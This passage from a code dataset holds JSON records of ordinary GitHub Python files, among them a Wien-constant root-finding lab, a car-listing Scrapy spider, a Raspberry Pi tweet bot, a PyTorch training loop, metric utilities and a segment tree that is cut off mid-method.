f(x) for each value x\n \"\"\"\n return 1 - 5 * np.exp(-x) \n\ndef binary_search(f, x_1, x_2, threshold):\n \"\"\"\n This function uses binary search to\n approximate the zero of a nonlinear equation\n \"\"\"\n dx = x_2 - x_1\n i = 0\n while dx > threshold:\n i = i + 1\n x_mid = (x_2 - x_1)/2 + x_1\n if np.sign(f(x_2)) != np.sign(f(x_mid)):\n x_1 = x_mid\n x_2 = x_2\n elif np.sign(f(x_1)) != np.sign(f(x_mid)):\n x_1 = x_1\n x_2 = x_mid\n else:\n print(\"Choose x_1 and x_2 on opposite sides of the zero\")\n dx = x_2 - x_1\n return [x_mid, i]\n\n\n\ndef newtons_method(f, f_prime, x, threshold):\n \"\"\"\n This function uses Newton's Method\n to approximate the zero of the function\n \"\"\"\n dx = 1\n i = 0\n while dx > threshold:\n i = i + 1\n xp = x - (f(x)/f_prime(x))\n dx = abs(xp - x)\n x = xp\n return i\n\ndef relax_count(f, threshold, x, dx):\n \"\"\"\n This function calculates the number\n of iterations required for the relaxation\n mehtod to converge to a the true answer within\n a given threshold.\n \"\"\"\n x_list = [x]\n i = 0\n 
while dx > threshold:\n x_list.append(f(x_list[-1]))\n dx = np.abs(x_list[-1]-x_list[-2])\n i += 1\n return i\n\n\nif __name__ == \"__main__\":\n\n threshold = 1e-6\n x_2 = 10\n x_1 = 1\n x_b = binary_search(f, x_1, x_2, threshold)[0]\n \n \n\n print(\"The zero is locates at: \")\n print(\"x = \", x_b)\n\n # displacemetn constant\n h = constants.Planck\n k = constants.Boltzmann\n c = constants.speed_of_light\n b = (c * h) / (k * x_b)\n print(\"Wien Displacement Constant is: \")\n print(\"b = \", b)\n\n # Part c\n # define lambda from the sun\n LAMBDA = 502e-9\n T = b / LAMBDA\n\n print(\"The temperature of the sun is estimated to be: \")\n print(T, \" K\")\n\n # this next part calculates the number of iterations it takes \n # each method to converge on the true value\n # it then plots number of iterations as a function of initial guess x\n count_b = []\n \n count_n = []\n \n count_r = []\n \n X = np.linspace(5, 50,100)\n plt.figure(1)\n\n\n\n for i in X:\n count_b.append(binary_search(f, x_1, i, threshold)[1])\n \n count_n.append(newtons_method(f, f_prime,i, threshold))\n \n count_r.append(relax_count(f_0, threshold, i, 1.0))\n\n \n plt.plot(X, count_b, label=\"Binary\")\n plt.plot(X, count_n, label=\"Newton\")\n plt.plot(X, count_r, label=\"Relaxation\")\n\n plt.xlabel('Choices for initial x')\n plt.ylabel('Number of iterations')\n plt.title('Iteration comparison between Newtons Method, Binary Search and Relaxation')\n plt.grid()\n plt.xlim(5,50)\n plt.legend()\n plt.savefig('Lab4_Q3c.png', dpi=300)\n plt.show()\n \n\n\n\n\n\n","repo_name":"brendanhalliday/Computational-Physics","sub_path":"LABS/Lab4/Lab04_Q3_c.py","file_name":"Lab04_Q3_c.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39412435957","text":"import os\nimport simfin as sf\n\nfrom utils.logger import get_logger\n\nlogger = get_logger(__name__)\n\nsf.set_api_key(api_key=os.getenv('SIMFIN_KEY'))\n\n\ndef get_financial_markets(data_dir: str='data'):\n logger.info(\"Loading a list of the financial markets\")\n sf.set_data_dir(data_dir)\n markets_df = sf.load_markets()\n return {val: key for key, val in markets_df['Market Name'].items()}\n","repo_name":"TomM25/value_screener","sub_path":"get_financial_markets.py","file_name":"get_financial_markets.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4699285135","text":"import sys\nfrom twython import Twython\nimport os\nimport datetime\nimport MySQLdb\n\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\nACCESS_KEY = ''\nACCESS_SECRET = ''\n\napi = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET)\n\ntask = status=sys.argv[1]\nmessage = status=sys.argv[2]\n\n# Open database connection\ndb = MySQLdb.connect(\"localhost\",\"danny\",\"danny123\",\"MYGARDEN\" )\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\nvWeatherAPITempData = \"404 error \";\nvTempsensor2 = \"404 error \";\nvWeatherAPIWeatherData = \"404 error \";\n\n\nif (task == 'CPU'):\n cmd = '/opt/vc/bin/vcgencmd measure_temp'\n line = os.popen(cmd).readline().strip()\n temp = line.split('=')[1].split(\"'\")[0]\n api.update_status(status='Dannyspi2.local CPU temperature is '+temp+' C - '+str(datetime.datetime.now()))\nif (task == 'message'):\n api.update_status(status=message+' - '+str(datetime.datetime.now()))\nif (task =='chart1'):\n photo = open('/var/www/Graph1.png','rb')\n 
api.update_status_with_media(media=photo, status='Outside Temp Chart - '+str(datetime.datetime.now()))\nif (task =='chart2'):\n photo = open('/var/www/Graph2.png','rb')\n api.update_status_with_media(media=photo, status='Inside Temp Chart - '+str(datetime.datetime.now()))\nif (task =='chart3'):\n photo = open('/var/www/Graph3.png','rb')\n api.update_status_with_media(media=photo, status='Outside Temp Chart all time -- '+str(datetime.datetime.now()))\nif (task =='chart4'):\n photo = open('/var/www/Graph4.png','rb')\n api.update_status_with_media(media=photo, status='Inside Temp Chart all time -- '+str(datetime.datetime.now()))\nif (task == 'temp'):\n cursor.execute(\"select SaveData from ControlLog where RunNumberId = (select max(RunNumberId) from RunNumber) and ActionName = 'temp sensor 2' ;\" )\n for row in cursor.fetchall():\n\n vTempsensor2 = (row[0])\n\n api.update_status(status='Internal Temp - '+str(vTempsensor2)+'C -- '+str(datetime.datetime.now()))\n\n cursor.execute(\"select SaveData from ControlLog where RunNumberId = (select max(RunNumberId) from RunNumber) and ActionName = 'Weather API' and LogDescription = 'Weather' ;\" )\n for row in cursor.fetchall():\n\n vWeatherAPIWeatherData = (row[0])\n\n cursor.execute(\"select SaveData from ControlLog where RunNumberId = (select max(RunNumberId) from RunNumber) and ActionName = 'Weather API' and LogDescription = 'Temp String' ;\" )\n for row in cursor.fetchall():\n\n vWeatherAPITempData = (row[0])\n\n api.update_status(status='API - Temp - '+str(vWeatherAPITempData)+' -- Weather -'+ vWeatherAPIWeatherData +' -- '+str(datetime.datetime.now()))\n","repo_name":"dprior1985/Tweet","sub_path":"SillyTweet.py","file_name":"SillyTweet.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18207685032","text":"class Solution:\n def findMaxAverage(self, nums: List[int], k: int) -> float:\n kErr = 1e-5\n l = min(nums)\n r = max(nums)\n\n # Returns true if there's a subarray with length >= k and average sum >= m.\n def check(m: float) -> bool:\n summ = 0\n prevSum = 0\n minPrevSum = 0\n\n for i, num in enumerate(nums):\n # -m for each num so that we can check if the sum of the subarray >= 0\n summ += num - m\n if i >= k:\n prevSum += nums[i - k] - m\n minPrevSum = min(minPrevSum, prevSum)\n # If sum - minPrevSum >= 0,\n # we know there's a subarray with length >= k and average sum >= m\n if i + 1 >= k and summ >= minPrevSum:\n return True\n\n return False\n\n while r - l > kErr:\n m = (l + r) / 2\n if check(m):\n l = m\n else:\n r = m\n\n return l\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0644. 
Maximum Average Subarray II/0644.py","file_name":"0644.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"1273389995","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn.parallel\n# from apex.optimizers.fused_lamb import FusedLAMB\nfrom timm.utils.distributed import reduce_tensor\nfrom torch.cuda.amp import autocast\nfrom tqdm import tqdm\n\nfrom utils import ioutils\nfrom utils.misc import AverageMeter\nfrom utils.misc import MetricLogger\n\n\ndef train_epoch(C_, args, epoch, model, loader, optimizer,\n lr_scheduler, criterion, loss_scaler, mixup_fn, wandb):\n if args.local_rank == 0 and C_.LOG_LEVEL >= 2:\n pbar = tqdm(total=len(loader))\n pbar.set_description('Ep:{:03d}'.format(epoch))\n\n num_updates = (epoch-1) * len(loader)\n\n loss_meter_s = AverageMeter()\n train_acc_meter_s = AverageMeter()\n loss_meter_l = AverageMeter()\n train_acc_meter_l = AverageMeter()\n metric_logger = MetricLogger(delimiter=' ')\n\n if C_.LOG_LEVEL >= 3:\n header = 'Epoch: [{}/{}]'.format(epoch, C_.MAX_EPOCHS)\n iterator = enumerate(metric_logger.log_every(loader, C_.LOG_INTERVAL, header))\n else:\n iterator = enumerate(loader)\n\n for batch_idx, batch in iterator:\n img, tgt = batch\n img = img.cuda(non_blocking=True)\n tgt = tgt.cuda(non_blocking=True)\n if mixup_fn is not None:\n img, tgt_tr = mixup_fn(img, tgt)\n else:\n tgt_tr = tgt\n\n optimizer.zero_grad(set_to_none=True)\n\n with autocast():\n logits = model(img)\n loss = criterion(logits, tgt_tr)\n curr_train_acc = (logits.argmax(dim=1) == tgt).sum()/float(len(tgt))\n\n loss_scaler(\n loss, optimizer,\n clip_grad=C_.GRAD_CLIP, clip_mode='norm',\n parameters=model.parameters(),\n create_graph=False)\n\n num_updates += 1\n\n lr_scheduler.step_update(num_updates)\n\n # NOTE: uncomment below to use warmup in steps but decay in epochs\n # if num_updates == C_.WARMUP_STEPS:\n # lr_scheduler.t_initial = lr_scheduler.t_initial//len(loader)\n # lr_scheduler.warmup_t = lr_scheduler.warmup_t//len(loader)\n # lr_scheduler.t_in_epochs = True\n\n if args.distributed:\n reduced_loss = reduce_tensor(loss.data, args.world_size)\n reduced_train_acc = reduce_tensor(curr_train_acc.data, args.world_size)\n else:\n reduced_loss = loss\n reduced_train_acc = curr_train_acc\n\n loss_meter_s.update(reduced_loss.item(), len(tgt))\n train_acc_meter_s.update(reduced_train_acc.item(), len(tgt))\n loss_meter_l.update(reduced_loss.item(), len(tgt))\n train_acc_meter_l.update(reduced_train_acc.item(), len(tgt))\n\n torch.cuda.synchronize()\n\n if args.local_rank == 0:\n if (batch_idx + 1) % C_.LOG_INTERVAL == 0:\n lrl = [param_group['lr'] for param_group in optimizer.param_groups]\n lr = sum(lrl) / len(lrl)\n log_dict = OrderedDict({\n 'Loss' : loss_meter_s.avg,\n 'Train Acc' : 100. 
* train_acc_meter_s.avg,\n 'LR' : lr\n })\n if C_.LOG_LEVEL >= 2:\n pbar.set_description(\n 'Ep:{:03d}, Loss:{:.4f}, Tr Acc:{:.2f}'.format(\n epoch, log_dict['Loss'], log_dict['Train Acc']),\n refresh=True)\n if args.rank == 0:\n wandb.log(log_dict)\n if C_.LOG_LEVEL == 4:\n log_str = ioutils.get_log_str(log_dict, title='Intra Epoch Log')\n print(log_str)\n loss_meter_s.reset()\n train_acc_meter_s.reset()\n\n if C_.LOG_LEVEL >= 2:\n pbar.update(1)\n\n lrl = [param_group['lr'] for param_group in optimizer.param_groups]\n lr = sum(lrl) / len(lrl)\n return OrderedDict({\n 'Epoch Lr' : ioutils.FormattedLogItem(lr, '{:.6f}'),\n 'Epoch Loss' : ioutils.FormattedLogItem(loss_meter_l.avg, '{:.6f}'),\n 'Epoch Train Acc' : ioutils.FormattedLogItem(100. * train_acc_meter_l.avg, '{:.2f}')\n })\n\n\n","repo_name":"samarth4149/task2sim","sub_path":"classifier/train_epoch.py","file_name":"train_epoch.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"27805946576","text":"'''\r\nDigital Image Processing\r\n16 April 2020\r\nby Sampada Petkar\r\n\r\nBitplane Slicing\r\n'''\r\n\r\nimport cv2 \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv2.imread('flower.jfif', 0) \r\nfig=plt.figure(figsize=(8, 8))\r\n\r\nfor k in range(0, 8):\r\n plane = np.full((img.shape[0], img.shape[1]), 2 ** k, np.uint8)\r\n res = cv2.bitwise_and(plane, img)\r\n x = res * 255\r\n ax = fig.add_subplot(3,3,k+2)\r\n ax.title.set_text(\"Plane \" + str(k+1))\r\n plt.imshow(x, cmap = \"gist_gray\")\r\n\r\nax1 = fig.add_subplot(3,3,1)\r\nax1.title.set_text(\"Input Image\")\r\nplt.imshow(img, cmap = \"gist_gray\")\r\n \r\nplt.show()\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","repo_name":"sampadap03/Digital-Signal-Processing","sub_path":"Digtal-Image-Processing/Bitplane Slicing.py","file_name":"Bitplane Slicing.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10939033437","text":"class Solution:\n def findJudge(self, n: int, trust: List[List[int]]) -> int:\n #n+1 because n starts from 1, not from 0\n #tc is the trust count, i.e. where the trust tallies are kept\n tc = [0] * (n+1)\n #if n is 2 then tc is [0, 0, 0]\n #if trust is [[1,2]]\n for x in trust:\n tc[x[0]] -=1\n #then tc at index 1 gets -1 so tc becomes [0, -1, 0]. index 1 comes from x[0]\n tc[x[1]] +=1\n #here tc at index 2 is incremented to 1 so tc is [0, -1, 1]. index 2 comes from x[1]\n #range starts from 1 because tc starts from index 1\n for i in range (1,n+1):\n #n-1 because if there is a judge, the judge is certainly someone who trusts no one else, so the judge should be the person with no outgoing connections\n if tc[i] == n-1:\n return i\n #if all n have connections then return -1 \n return -1\n","repo_name":"galuhardiansyah/test","sub_path":"judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44663251216","text":"from django.urls import path\n#from .views import UserAPIView\nfrom . 
import views\n\nurlpatterns = [\n path('',views.login, name=\"display\"),\n path('signin/',views.signin,name=\"signin\"),\n path('fetch/',views.getUser, name=\"getu\"),\n path('submit/',views.submitUser, name=\"submitb\"),\n]\n","repo_name":"Archit9394/React_app1","sub_path":"display/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16600235102","text":"\"\"\"Trying out a model implementation with the mnist data (it takes too long to run, so the output was not checked)\"\"\"\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.keras import datasets, layers, models\r\n\r\n(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()\r\ntrain_images = train_images.reshape((60000, 28, 28, 1))\r\ntest_images = test_images.reshape((10000, 28, 28, 1))\r\n# Normalize the pixel values to the 0~1 range.\r\ntrain_images, test_images = train_images / 255.0, test_images / 255.0\r\n\r\nmodel = models.Sequential()\r\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1),padding='same',strides=1))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu',padding='same',strides=1))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dense(10, activation='softmax'))\r\nmodel.summary()\r\nmodel.compile(optimizer='adam',loss='sparse_categorical_crossentropy',metrics=['accuracy'])\r\nmodel.fit(train_images, train_labels, epochs=5)\r\n#Build the model\r\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\r\nprint(test_acc)\r\n","repo_name":"dlwlsdn201/2020CapstonDesign_OOTD-Project","sub_path":"JH_CNN_MNIST.py","file_name":"JH_CNN_MNIST.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14634227083","text":"# coding=utf-8\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\nREDIS_CONF = {\n \"host\": \"127.0.0.1\",\n \"port\": \"6380\"\n}\n\n\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\nDATA_DIR = f\"{BASE_DIR}/data\"\n","repo_name":"SardarDawar/judge","sub_path":"oj/dev_settings.py","file_name":"dev_settings.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72608391734","text":"#!/usr/bin/env python3\n\nfrom inspect import currentframe\nimport re\n\n\n\nclass Scraping_utilities:\n\n @staticmethod\n def __parse_name(string):\n try:\n return string.split(\"(\")[0].strip()\n except Exception as ex:\n print(\"Error on line no: {}\".format( ex))\n\n @staticmethod\n def __extract_digits(string):\n try:\n return int(re.search(r'\\d+', string).group(0))\n except Exception as ex:\n print(\"Error on line no.: {}\".format( ex))\n","repo_name":"HamedMinaeizaeim/twitter_scraper_without_API","sub_path":"src/twitter_scraper_without_api/scraping_utilities.py","file_name":"scraping_utilities.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"35056529622","text":"from scrapy import Request\nfrom scrapy import Spider\nfrom re import findall\n\n\nclass KavakspiderSpider(Spider):\n name = 'KavakSpider'\n allowed_domains = ['www.kavak.com']\n\n def 
start_requests(self):\n urls = [\n 'https://www.kavak.com/br/carros-usados']\n\n for x in range(2, 157):\n l = f'https://www.kavak.com/br/page-{x}/carros-usados'\n urls.append(l)\n\n for url in urls:\n yield Request(\n url,\n callback=self.parse\n )\n\n def parse(self, response, **kwargs):\n\n model = response.css(\n 'div[class=\"card-body\"] h2::text').getall()\n details = response.css(\n 'div[class=\"card-body\"] p::text').getall()\n years = [''.join(findall(r'(\\w+)', x)[0])\n for x in details if findall('•', x)]\n distance = [''.join(findall(r'(\\w+)', x)[1:3])\n for x in details if findall('•', x)]\n state = [' '.join(findall(r'(\\w+)', x)[4:])\n for x in details if findall('•', x)]\n prize = response.css(\n 'div[class=\"payment-tax-wrapper\"] span::text').getall()\n\n for modelo, ano, preco, kil, estado in zip(model, years, prize, distance, state):\n yield {\n \"Modelo\": modelo,\n \"Ano\": ano,\n \"Preço\": preco,\n \"KM\": kil,\n \"Estado\": estado\n }\n","repo_name":"gustavocoiimbra/scrapy-site-kavak","sub_path":"Kavak/spiders/KavakSpider.py","file_name":"KavakSpider.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16935522084","text":"import string\nfrom stemming.porter2 import stem\nfrom nltk.corpus import stopwords\nimport DependencyParser\n\n\ndef tokenize(get_queries):\n def wrapper(*args, **kwargs):\n queries = get_queries(*args, **kwargs)\n cleaned = cleanUp(queries)\n avoid = list()\n for k, v in cleaned.iteritems():\n # cleaned[k] = v.split(\" \")\n cleaned[k] = preprocess_query(v.split(\" \"), avoid)\n return cleaned\n return wrapper\n\n\ndef cleanUp(queries):\n for k, v in queries.iteritems():\n punctuations = set(string.punctuation)\n v_without_puncts = \"\"\n for ch in v:\n if ch in punctuations:\n v_without_puncts += ' '\n else:\n v_without_puncts += ch\n queries[k] = v_without_puncts.strip()\n return queries\n\n\ndef preprocess_query(tokens, avoid):\n stop_words = stopwords.words('english')\n stemmed = list()\n for token in tokens:\n if token not in stop_words + avoid:\n # stemmed.append(token.lower())\n stemmed.append(stem(token.lower()))\n return set(stemmed)\n\n\ndef dependency_parse(get_queries):\n def wrapper(*args, **kwargs):\n queries = get_queries(*args, **kwargs)\n cleaned = cleanUp(queries)\n\n for k, v in cleaned.iteritems():\n avoid = DependencyParser.parse(v)\n avoid.append('Document')\n cleaned[k] = preprocess_query(v.split(\" \"), avoid)\n\n return cleaned\n return wrapper\n","repo_name":"manthan787/IR","sub_path":"HW1/Query/Decorators.py","file_name":"Decorators.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28497967990","text":"import torch\nimport numpy as np\nfrom scipy.stats import pearsonr\n\n\ndef compute_scores(posterior_dist, test_data):\n \"\"\"Computes prediction scores\n Args:\n posterior_dist (torch.distributions.Distribution): (time,)\n test_data (ScenarioDataset)\n Returns:\n type: dict[float]\n \"\"\"\n # Extract posterior mean prediction\n posterior_mean = posterior_dist.mean.cpu()\n\n # Compute metrics over all predictions\n scores_deterministic = compute_deterministic_metrics(posterior_mean, test_data.tas)\n scores_probabilistic = compute_probabilistic_metrics(posterior_dist, test_data.tas)\n\n # Encapsulate scores into output dictionary\n output = {**scores_deterministic, **scores_probabilistic}\n 
return output\n\n\ndef compute_deterministic_metrics(prediction, groundtruth):\n \"\"\"Compute deterministic metrics between posterior mean and groundtruth\n\n Args:\n prediction (torch.Tensor): (time,)\n groundtruth (torch.Tensor): (time,)\n\n Returns:\n type: dict[float]\n \"\"\"\n # Compute raw distance metrics\n difference = prediction.sub(groundtruth)\n mean_bias = difference.mean()\n rmse = torch.square(difference).mean().sqrt()\n mae = torch.abs(difference).mean()\n\n # Compute spearman correlation\n corr = spearman_correlation(prediction.flatten(), groundtruth.flatten())\n\n # Encapsulate results in output dictionary\n output = {'mb': mean_bias.item(),\n 'rmse': rmse.item(),\n 'mae': mae.item(),\n 'corr': corr}\n return output\n\n\ndef compute_probabilistic_metrics(predicted_dist, groundtruth):\n \"\"\"Computes probabilistic metrics between posterior distribution and groundtruth\n\n Args:\n posterior_dist (torch.distributions.Distribution): (time,)\n groundtruth (torch.Tensor): (time,)\n\n Returns:\n type: dict[float]\n \"\"\"\n # Create normal distribution vector\n pointwise_predicted_dict = torch.distributions.Normal(loc=predicted_dist.mean, scale=predicted_dist.stddev)\n\n # Compute average LL of groundtruth\n ll = pointwise_predicted_dict.log_prob(groundtruth).mean()\n\n # Compute 95% calibration score\n lb, ub = pointwise_predicted_dict.icdf(torch.tensor(0.025)), pointwise_predicted_dict.icdf(torch.tensor(0.975))\n mask = (groundtruth >= lb) & (groundtruth <= ub)\n calib95 = mask.float().mean()\n\n # Compute integral calibration index\n confidence_region_sizes = np.arange(0.05, 1.0, 0.05)\n calibs = []\n for size in confidence_region_sizes:\n q_lb = (1 - float(size)) / 2\n q_ub = 1 - q_lb\n lb, ub = pointwise_predicted_dict.icdf(torch.tensor(q_lb)), pointwise_predicted_dict.icdf(torch.tensor(q_ub))\n mask = (groundtruth >= lb) & (groundtruth <= ub)\n calibs.append(mask.float().mean().item())\n ICI = np.abs(np.asarray(calibs) - confidence_region_sizes).mean()\n\n # Compute CRPS\n mu, sigma = predicted_dist.mean, predicted_dist.stddev\n y = (groundtruth - mu) / sigma\n norm = torch.distributions.Normal(0, 1)\n crps = torch.mean(sigma * (y * (2 * norm.cdf(y) - 1) + 2 * norm.log_prob(y).exp() - 1 / np.sqrt(np.pi)))\n\n # Encapsulate results in output dictionary\n output = {'ll': ll.item(),\n 'calib95': calib95.item(),\n 'CRPS': crps.item(),\n 'ICI': ICI.item()}\n return output\n\n\ndef spearman_correlation(x, y):\n \"\"\"Computes Spearman Correlation between x and y\n Args:\n x (torch.Tensor)\n y (torch.Tensor)\n Returns:\n type: torch.Tensor\n \"\"\"\n x_std = (x - x.mean()) / x.std()\n y_std = (y - y.mean()) / y.std()\n corr = float(pearsonr(x_std.numpy(), y_std.numpy())[0])\n return corr\n","repo_name":"shahineb/FaIRGP","sub_path":"src/evaluation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12069554175","text":"import pygame\r\nimport math\r\nfrom pygame.locals import *\r\nWIDTH = 1280\r\nHEIGHT = 720\r\nCELL_SIZE = 30\r\n\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nGREEN = (0, 255, 0)\r\nRED = (255, 0, 0)\r\nBLUE = (0, 0, 255)\r\nORANGE = (255, 165, 0)\r\nGRAY = (129, 133, 137)\r\n\r\ndef read_map(filepath):\r\n with open(filepath, 'r') as file:\r\n n, m = map(int, file.readline().strip().split(\" \"))\r\n pac_map = []\r\n for _ in range(n):\r\n row = [int(x) for x in file.readline().strip().split(\" \")]\r\n 
pac_map.append(row)\r\n pac_pos = tuple(map(int, file.readline().strip().split(\" \")))\r\n food = [(i, j) for i in range(len(pac_map)) for j in range(len(pac_map[0])) if pac_map[i][j] == 2]\r\n monster = [(i, j) for i in range(len(pac_map)) for j in range(len(pac_map[0])) if pac_map[i][j] == 3]\r\n wall = [(i, j) for i in range(len(pac_map)) for j in range(len(pac_map[0])) if pac_map[i][j] == 1]\r\n return [pac_map, pac_pos, food, monster, wall]\r\n\r\nmap_dict = {'Level1':[read_map('Levels/level1/map1.txt'),read_map('Levels/level1/map2.txt'),read_map('Levels/level1/map3.txt')],\r\n 'Level2':[read_map('Levels/level2/map1.txt'), read_map('Levels/level2/map2.txt'),read_map('Levels/level1/map3.txt')],\r\n 'Level3':[read_map('Levels/level3/map1.txt'), read_map('Levels/level3/map2.txt'),read_map('Levels/level3/map3.txt')],\r\n 'Level4':[read_map('Levels/level4/map1.txt'),read_map('Levels/level4/map2.txt'),read_map('Levels/level4/map3.txt')]}\r\n\r\n\r\nchange_map_list = [read_map('Levels/level1/map1.txt')[0],read_map('Levels/level1/map2.txt')[0],read_map('Levels/level1/map3.txt')[0]]\r\nvictory_bg = pygame.transform.scale(pygame.image.load(\"images/victory.png\"),(WIDTH,HEIGHT))\r\ndef get_map_pos_y(map,CELL_SIZE):\r\n return WIDTH // 2 - (CELL_SIZE * len(map[0]) // 2)\r\ndef get_map_pos_x(map,CELL_SIZE):\r\n return HEIGHT // 2 - (CELL_SIZE * len(map) // 2)\r\n\r\ndef get_font(size): # Returns Press-Start-2P in the desired size\r\n return pygame.font.Font(\"font/font.ttf\", size)\r\n\r\ndef victory_state(screen):\r\n screen.blit(victory_bg, (0, 0))","repo_name":"nghia3anp3/csAI-21TNT1-pacman","sub_path":"NH/Variables.py","file_name":"Variables.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31038312624","text":"#!/Users/amod/venv/bin/python\n# name : Amod\n# date : 1 april 2020\nimport argparse\n\n\n# Function definition\ndef print_me():\n print(\"Test print\")\n\n\ndef add(a, b):\n print(a+b)\n\n\ndef sub(x, y):\n '''doc string\n this method is subtraction\n it takes argument x, y\n '''\n c = x - y\n print(c)\n\n\ndef multiply(a, b):\n print(int(a)*int(b))\n\n\ndef divide(a, b):\n print(int(a)/int(b))\n\n\n\n\n# main Program\n#a = input(\"Enter an integer value : \")\n#b = input(\"Enter an integer value : \")\n#op = input(\"Enter either * or / or + or -\")\n\nparser = argparse.ArgumentParser(description=\"Math Calculation\")\nparser.add_argument('a', type=int, help=\"Enter only integers\")\nparser.add_argument('b', type=int, help=\"Enter only integers\")\nparser.add_argument('op', type=str, help=\"Enter only symbols * or / or + or --\")\nargs = parser.parse_args()\n# print(args)\na = args.a\nb = args.b\nop = args.op\n\n\nif op == \"*\":\n multiply(a, b)\nelif op == \"/\":\n divide(a, b)\nelif op == \"+\":\n add(a, b)\nelif op == \"-\":\n sub(int(a), b)\nelse:\n print(\"Incorrect input\")\n","repo_name":"AmodGawade/Python_programs","sub_path":"Programs/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19348403744","text":"#https://www.it-swarm.dev/es/python/como-ejecutar-una-funcion-de-forma-asincrona-cada-60-segundos-en-python/968384697/\n\n#https://www.generacodice.it/es/articolo/348349/How-to-execute-a-function-asynchronously-every-60-seconds-in-Python\n\nimport threading\nimport time\nglobal j\nj=0\n\ndef miaa():\n h=23\n print(h)\n\ndef 
f():\n global j\n j += 1\n print(\"hello world {}\".format(j))\n threading.Timer(3, f).start()\n\n #while(True):\n\n # time.sleep(3)\n # hola=input('Ingrese los datos:')\n\nif __name__ == '__main__':\n f() \n miaa() \n time.sleep(20)\n","repo_name":"epm1989/C7test","sub_path":"snippet_personales/pryevaasync.py","file_name":"pryevaasync.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74651268211","text":"import math\r\n\r\nclass SegmentTreeNode:\r\n def __init__(self, v=0):\r\n self.sum = v\r\n def merge(self, left, right):\r\n if left is not None and right is not None:\r\n self.sum = left.sum + right.sum\r\n elif left is None and right is None:\r\n self.sum = 0\r\n elif left is None:\r\n self.sum = right.sum\r\n else:\r\n self.sum = left.sum\r\n\r\nclass SegmentTree:\r\n def __init__(self, a):\r\n n = len(a)\r\n power = math.ceil(math.log(n, 2))\r\n total = 2 ** (power + 1)\r\n self.__tree = [None] * int(total)\r\n self.__leaf_length = int(total/2)-1\r\n self.__build(1, 0, self.__leaf_length, a)\r\n\r\n def __build(self, node, l, r, a):\r\n if l == r:\r\n self.__tree[node] = SegmentTreeNode()\r\n try:\r\n self.__tree[node].sum = a[l]\r\n except IndexError:\r\n self.__tree[node].sum = 0\r\n return\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n self.__build(leftchild, l, mid, a)\r\n self.__build(rightchild, mid + 1, r, a)\r\n self.__tree[node] = SegmentTreeNode()\r\n l = self.__tree[leftchild]\r\n r = self.__tree[rightchild]\r\n self.__tree[node].merge(l, r)\r\n\r\n def __query(self, node, l, r, i, j):\r\n if l >= i and r <= j:\r\n return self.__tree[node]\r\n elif j < l or i > r:\r\n return None\r\n else:\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n 